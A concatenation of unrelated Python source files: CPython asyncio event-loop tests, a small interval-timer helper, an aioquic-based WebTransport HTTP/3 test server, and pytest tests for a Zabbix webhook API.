self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
interval.py
|
from threading import Event, Thread
def SetInterval(interval, func, *args):
stopped = Event()
# call it right away
func(*args)
def loop():
# then call it after the first interval has elapsed
while not stopped.wait(interval):
func(*args)
Thread(target=loop, daemon=True).start()
return stopped.set
|
webtransport_h3_server.py
|
import asyncio
import logging
import os
import ssl
import threading
import traceback
from urllib.parse import urlparse
from typing import Any, Dict, List, Optional, Tuple
# TODO(bashi): Remove import check suppressions once aioquic dependency is resolved.
from aioquic.buffer import Buffer # type: ignore
from aioquic.asyncio import QuicConnectionProtocol, serve # type: ignore
from aioquic.asyncio.client import connect # type: ignore
from aioquic.h3.connection import H3_ALPN, FrameType, H3Connection, ProtocolError, Setting # type: ignore
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived, DataReceived # type: ignore
from aioquic.quic.configuration import QuicConfiguration # type: ignore
from aioquic.quic.connection import stream_is_unidirectional # type: ignore
from aioquic.quic.events import QuicEvent, ProtocolNegotiated, ConnectionTerminated, StreamReset # type: ignore
from aioquic.tls import SessionTicket # type: ignore
from tools.wptserve.wptserve import stash # type: ignore
from .capsule import H3Capsule, H3CapsuleDecoder, CapsuleType
"""
A WebTransport over HTTP/3 server for testing.
The server interprets the underlying protocols (WebTransport, HTTP/3 and QUIC)
and passes events to a particular webtransport handler. From the standpoint of
test authors, a webtransport handler is a Python script which contains some
callback functions. See handler.py for available callbacks.
"""
SERVER_NAME = 'webtransport-h3-server'
_logger: logging.Logger = logging.getLogger(__name__)
_doc_root: str = ""
class H3ConnectionWithDatagram04(H3Connection):
"""
A H3Connection subclass, to make it work with the latest
HTTP Datagram protocol.
"""
H3_DATAGRAM_04 = 0xffd277
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._supports_h3_datagram_04 = False
def _validate_settings(self, settings: Dict[int, int]) -> None:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
if H3_DATAGRAM_04 in settings and settings[H3_DATAGRAM_04] == 1:
settings[Setting.H3_DATAGRAM] = 1
self._supports_h3_datagram_04 = True
return super()._validate_settings(settings)
def _get_local_settings(self) -> Dict[int, int]:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
settings = super()._get_local_settings()
settings[H3_DATAGRAM_04] = 1
return settings
@property
def supports_h3_datagram_04(self) -> bool:
"""
True if the client supports the latest HTTP Datagram protocol.
"""
return self._supports_h3_datagram_04
class WebTransportH3Protocol(QuicConnectionProtocol):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._handler: Optional[Any] = None
self._http: Optional[H3ConnectionWithDatagram04] = None
self._session_stream_id: Optional[int] = None
self._close_info: Optional[Tuple[int, bytes]] = None
self._capsule_decoder_for_session_stream: H3CapsuleDecoder =\
H3CapsuleDecoder()
self._allow_calling_session_closed = True
self._allow_datagrams = False
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3ConnectionWithDatagram04(
self._quic, enable_webtransport=True)
if not self._http.supports_h3_datagram_04:
self._allow_datagrams = True
if self._http is not None:
for http_event in self._http.handle_event(event):
self._h3_event_received(http_event)
if isinstance(event, ConnectionTerminated):
self._call_session_closed(close_info=None, abruptly=True)
if isinstance(event, StreamReset):
if self._handler:
self._handler.stream_reset(event.stream_id, event.error_code)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
# Convert from List[Tuple[bytes, bytes]] to Dict[bytes, bytes].
# Only the last header will be kept when there are duplicate
# headers.
headers = {}
for header, value in event.headers:
headers[header] = value
method = headers.get(b":method")
protocol = headers.get(b":protocol")
if method == b"CONNECT" and protocol == b"webtransport":
self._session_stream_id = event.stream_id
self._handshake_webtransport(event, headers)
else:
self._send_error_response(event.stream_id, 400)
if isinstance(event, DataReceived) and\
self._session_stream_id == event.stream_id:
if self._http and not self._http.supports_h3_datagram_04 and\
len(event.data) > 0:
raise ProtocolError('Unexpected data on the session stream')
self._receive_data_on_session_stream(
event.data, event.stream_ended)
elif self._handler is not None:
if isinstance(event, WebTransportStreamDataReceived):
self._handler.stream_data_received(
stream_id=event.stream_id,
data=event.data,
stream_ended=event.stream_ended)
elif isinstance(event, DatagramReceived):
if self._allow_datagrams:
self._handler.datagram_received(data=event.data)
def _receive_data_on_session_stream(self, data: bytes, fin: bool) -> None:
self._capsule_decoder_for_session_stream.append(data)
if fin:
self._capsule_decoder_for_session_stream.final()
for capsule in self._capsule_decoder_for_session_stream:
if capsule.type in {CapsuleType.DATAGRAM,
CapsuleType.REGISTER_DATAGRAM_CONTEXT,
CapsuleType.CLOSE_DATAGRAM_CONTEXT}:
raise ProtocolError(
"Unimplemented capsule type: {}".format(capsule.type))
if capsule.type in {CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT,
CapsuleType.CLOSE_WEBTRANSPORT_SESSION}:
# We'll handle this case below.
pass
else:
# We should ignore unknown capsules.
continue
if self._close_info is not None:
raise ProtocolError((
"Receiving a capsule with type = {} after receiving " +
"CLOSE_WEBTRANSPORT_SESSION").format(capsule.type))
if capsule.type == CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT:
buffer = Buffer(data=capsule.data)
format_type = buffer.pull_uint_var()
# https://ietf-wg-webtrans.github.io/draft-ietf-webtrans-http3/draft-ietf-webtrans-http3.html#name-datagram-format-type
WEBTRANPORT_FORMAT_TYPE = 0xff7c00
if format_type != WEBTRANPORT_FORMAT_TYPE:
raise ProtocolError(
"Unexpected datagram format type: {}".format(
format_type))
self._allow_datagrams = True
elif capsule.type == CapsuleType.CLOSE_WEBTRANSPORT_SESSION:
buffer = Buffer(data=capsule.data)
code = buffer.pull_uint32()
# 4 bytes for the uint32.
reason = buffer.pull_bytes(len(capsule.data) - 4)
# TODO(yutakahirano): Make sure `reason` is a UTF-8 text.
self._close_info = (code, reason)
if fin:
self._call_session_closed(self._close_info, abruptly=False)
def _send_error_response(self, stream_id: int, status_code: int) -> None:
assert self._http is not None
headers = [(b"server", SERVER_NAME.encode()),
(b":status", str(status_code).encode())]
self._http.send_headers(stream_id=stream_id,
headers=headers,
end_stream=True)
def _handshake_webtransport(self, event: HeadersReceived,
request_headers: Dict[bytes, bytes]) -> None:
assert self._http is not None
path = request_headers.get(b":path")
if path is None:
# `:path` must be provided.
self._send_error_response(event.stream_id, 400)
return
# Create a handler using `:path`.
try:
self._handler = self._create_event_handler(
session_id=event.stream_id,
path=path,
request_headers=event.headers)
except IOError:
self._send_error_response(event.stream_id, 404)
return
response_headers = [
(b"server", SERVER_NAME.encode()),
(b"sec-webtransport-http3-draft", b"draft02"),
]
self._handler.connect_received(response_headers=response_headers)
status_code = None
for name, value in response_headers:
if name == b":status":
status_code = value
break
if not status_code:
response_headers.append((b":status", b"200"))
self._http.send_headers(stream_id=event.stream_id,
headers=response_headers)
if status_code is None or status_code == b"200":
self._handler.session_established()
def _create_event_handler(self, session_id: int, path: bytes,
request_headers: List[Tuple[bytes, bytes]]) -> Any:
parsed = urlparse(path.decode())
file_path = os.path.join(_doc_root, parsed.path.lstrip("/"))
callbacks = {"__file__": file_path}
with open(file_path) as f:
exec(compile(f.read(), path, "exec"), callbacks)
session = WebTransportSession(self, session_id, request_headers)
return WebTransportEventHandler(session, callbacks)
def _call_session_closed(
self, close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
allow_calling_session_closed = self._allow_calling_session_closed
self._allow_calling_session_closed = False
if self._handler and allow_calling_session_closed:
self._handler.session_closed(close_info, abruptly)
class WebTransportSession:
"""
A WebTransport session.
"""
def __init__(self, protocol: WebTransportH3Protocol, session_id: int,
request_headers: List[Tuple[bytes, bytes]]) -> None:
self.session_id = session_id
self.request_headers = request_headers
self._protocol: WebTransportH3Protocol = protocol
self._http: H3Connection = protocol._http
# Use the a shared default path for all handlers so that different
# WebTransport sessions can access the same store easily.
self._stash_path = '/webtransport/handlers'
self._stash: Optional[stash.Stash] = None
self._dict_for_handlers: Dict[str, Any] = {}
@property
def stash(self) -> stash.Stash:
"""A Stash object for storing cross-session state."""
if self._stash is None:
address, authkey = stash.load_env_config()
self._stash = stash.Stash(self._stash_path, address, authkey)
return self._stash
@property
def dict_for_handlers(self) -> Dict[str, Any]:
"""A dictionary that handlers can attach arbitrary data."""
return self._dict_for_handlers
def stream_is_unidirectional(self, stream_id: int) -> bool:
"""Return True if the stream is unidirectional."""
return stream_is_unidirectional(stream_id)
def close(self, close_info: Optional[Tuple[int, bytes]]) -> None:
"""
Close the session.
:param close_info The close information to send.
"""
self._protocol._allow_calling_session_closed = False
assert self._protocol._session_stream_id is not None
session_stream_id = self._protocol._session_stream_id
if close_info is not None:
code = close_info[0]
reason = close_info[1]
buffer = Buffer(capacity=len(reason) + 4)
buffer.push_uint32(code)
buffer.push_bytes(reason)
capsule =\
H3Capsule(CapsuleType.CLOSE_WEBTRANSPORT_SESSION, buffer.data)
self._http.send_data(session_stream_id, capsule.encode(), end_stream=False)
self._http.send_data(session_stream_id, b'', end_stream=True)
# TODO(yutakahirano): Reset all other streams.
# TODO(yutakahirano): Reject future stream open requests
# We need to wait for the stream data to arrive at the client, and then
# we need to close the connection. At this moment we're relying on the
# client's behavior.
# TODO(yutakahirano): Implement the above.
def create_unidirectional_stream(self) -> int:
"""
Create a unidirectional WebTransport stream and return the stream ID.
"""
return self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=True)
def create_bidirectional_stream(self) -> int:
"""
Create a bidirectional WebTransport stream and return the stream ID.
"""
stream_id = self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=False)
# TODO(bashi): Remove this workaround when aioquic supports receiving
# data on server-initiated bidirectional streams.
stream = self._http._get_or_create_stream(stream_id)
assert stream.frame_type is None
assert stream.session_id is None
stream.frame_type = FrameType.WEBTRANSPORT_STREAM
stream.session_id = self.session_id
return stream_id
def send_stream_data(self,
stream_id: int,
data: bytes,
end_stream: bool = False) -> None:
"""
Send data on the specific stream.
:param stream_id: The stream ID on which to send the data.
:param data: The data to send.
:param end_stream: If set to True, the stream will be closed.
"""
self._http._quic.send_stream_data(stream_id=stream_id,
data=data,
end_stream=end_stream)
def send_datagram(self, data: bytes) -> None:
"""
Send data using a datagram frame.
:param data: The data to send.
"""
if not self._protocol._allow_datagrams:
_logger.warn(
"Sending a datagram while that's now allowed - discarding it")
return
flow_id = self.session_id
if self._http.supports_h3_datagram_04:
# The REGISTER_DATAGRAM_NO_CONTEXT capsule was on the session
# stream, so we must have the ID of the stream.
assert self._protocol._session_stream_id is not None
# TODO(yutakahirano): Make sure if this is the correct logic.
# Chrome always use 0 for the initial stream and the initial flow
# ID, we cannot check the correctness with it.
flow_id = self._protocol._session_stream_id // 4
self._http.send_datagram(flow_id=flow_id, data=data)
def stop_stream(self, stream_id: int, code: int) -> None:
"""
Send a STOP_SENDING frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.stop_stream(stream_id, code)
def reset_stream(self, stream_id: int, code: int) -> None:
"""
Send a RESET_STREAM frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.reset_stream(stream_id, code)
class WebTransportEventHandler:
def __init__(self, session: WebTransportSession,
callbacks: Dict[str, Any]) -> None:
self._session = session
self._callbacks = callbacks
def _run_callback(self, callback_name: str,
*args: Any, **kwargs: Any) -> None:
if callback_name not in self._callbacks:
return
try:
self._callbacks[callback_name](*args, **kwargs)
except Exception as e:
_logger.warn(str(e))
traceback.print_exc()
def connect_received(self, response_headers: List[Tuple[bytes,
bytes]]) -> None:
self._run_callback("connect_received", self._session.request_headers,
response_headers)
def session_established(self) -> None:
self._run_callback("session_established", self._session)
def stream_data_received(self, stream_id: int, data: bytes,
stream_ended: bool) -> None:
self._run_callback("stream_data_received", self._session, stream_id,
data, stream_ended)
def datagram_received(self, data: bytes) -> None:
self._run_callback("datagram_received", self._session, data)
def session_closed(
self,
close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
self._run_callback(
"session_closed", self._session, close_info, abruptly=abruptly)
def stream_reset(self, stream_id: int, error_code: int) -> None:
self._run_callback(
"stream_reset", self._session, stream_id, error_code)
class SessionTicketStore:
"""
Simple in-memory store for session tickets.
"""
def __init__(self) -> None:
self.tickets: Dict[bytes, SessionTicket] = {}
def add(self, ticket: SessionTicket) -> None:
self.tickets[ticket.ticket] = ticket
def pop(self, label: bytes) -> Optional[SessionTicket]:
return self.tickets.pop(label, None)
class WebTransportH3Server:
"""
A WebTransport over HTTP/3 for testing.
:param host: Host from which to serve.
:param port: Port from which to serve.
:param doc_root: Document root for serving handlers.
:param cert_path: Path to certificate file to use.
:param key_path: Path to key file to use.
:param logger: a Logger object for this server.
"""
def __init__(self, host: str, port: int, doc_root: str, cert_path: str,
key_path: str, logger: Optional[logging.Logger]) -> None:
self.host = host
self.port = port
self.doc_root = doc_root
self.cert_path = cert_path
self.key_path = key_path
self.started = False
global _doc_root
_doc_root = self.doc_root
global _logger
if logger is not None:
_logger = logger
def start(self) -> None:
"""Start the server."""
self.server_thread = threading.Thread(
target=self._start_on_server_thread, daemon=True)
self.server_thread.start()
self.started = True
def _start_on_server_thread(self) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=False,
max_datagram_frame_size=65536,
)
_logger.info("Starting WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
configuration.load_cert_chain(self.cert_path, self.key_path)
ticket_store = SessionTicketStore()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(
serve(
self.host,
self.port,
configuration=configuration,
create_protocol=WebTransportH3Protocol,
session_ticket_fetcher=ticket_store.pop,
session_ticket_handler=ticket_store.add,
))
self.loop.run_forever()
def stop(self) -> None:
"""Stop the server."""
if self.started:
asyncio.run_coroutine_threadsafe(self._stop_on_server_thread(),
self.loop)
self.server_thread.join()
_logger.info("Stopped WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
self.started = False
async def _stop_on_server_thread(self) -> None:
self.loop.stop()
def server_is_running(host: str, port: int, timeout: float) -> bool:
"""
Check the WebTransport over HTTP/3 server is running at the given `host` and
`port`.
"""
loop = asyncio.get_event_loop()
return loop.run_until_complete(_connect_server_with_timeout(host, port, timeout))
async def _connect_server_with_timeout(host: str, port: int, timeout: float) -> bool:
try:
await asyncio.wait_for(_connect_to_server(host, port), timeout=timeout)
except asyncio.TimeoutError:
_logger.warning("Failed to connect WebTransport over HTTP/3 server")
return False
return True
async def _connect_to_server(host: str, port: int) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=True,
verify_mode=ssl.CERT_NONE,
)
async with connect(host, port, configuration=configuration) as protocol:
await protocol.ping()
|
test_main.py
|
"""
Goal: Implement ZWL API testing
@authors:
Gaël MONDON
"""
import json
import socket
import base64
import os
import threading
import pytest
from fastapi.testclient import TestClient
from app.tests import TCPServer
from app.main import app
from app.config import defaults
valid_credentials = base64.b64encode(str.encode("{}:{}".format(defaults['username'], defaults['password']))).decode("utf-8")
current_dir = os.getcwd()
current_dir = current_dir + '/zabbix-webhook/src/app/tests/data'
client = TestClient(app)
@pytest.fixture()
def dummy_tcp_server():
tcp_server = TCPServer.TCPServer()
with tcp_server as example_server:
thread = threading.Thread(target=example_server.listen_for_traffic)
thread.daemon = True
thread.start()
yield example_server
def read_json_file(filename):
# read file content and return as JSON Dict
with open(filename, 'r') as file:
return json.load(file)
def exec_post_global(url, data={}, auth=True, add_headers=None):
h = {}
if auth is True:
h = {"Content-Type": "application/json", "Authorization": "Basic " + valid_credentials}
if add_headers is not None:
h = h | add_headers
#print(current_dir+'/headers:{}'.format(h))
return client.post(url, json=data, headers=h)
def test_post_aws(dummy_tcp_server):
response = exec_post_global("/zabbix/aws/sns",
read_json_file(current_dir+'/aws.notif.json'),
True,
{'x-amz-sns-message-type': 'Notification'})
print('test_post_aws.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_aws_no_auth():
response = exec_post_global("/zabbix/aws/sns",
{}, False)
print('test_post_aws_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_post_gcp(dummy_tcp_server):
response = exec_post_global("/zabbix/gcp",
read_json_file(current_dir+'/gcp.incident1.json'))
print('test_post_gcp.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_gcp_no_auth():
response = exec_post_global("/zabbix/gcp",
{}, False)
print('test_post_gcp_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_post_azure_common(dummy_tcp_server):
response = exec_post_global("/zabbix/azure/common",
read_json_file(current_dir+'/azure.common.json'))
print(current_dir+'/test_post_azure_common.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_azure_common_no_auth():
response = exec_post_global("/zabbix/azure/common",
{}, False)
print('test_post_azure_common_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_post_generic(dummy_tcp_server):
response = exec_post_global("/zabbix/generic",
read_json_file(current_dir+'/generic.json'))
print('test_post_generic.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_post_generic_no_auth():
response = exec_post_global("/zabbix/generic",
{}, False)
print('test_post_generic_no_auth.status_code:{}'.format(response.status_code))
assert response.status_code == 401
def test_get_health_stats():
response = client.get("/health/stats",
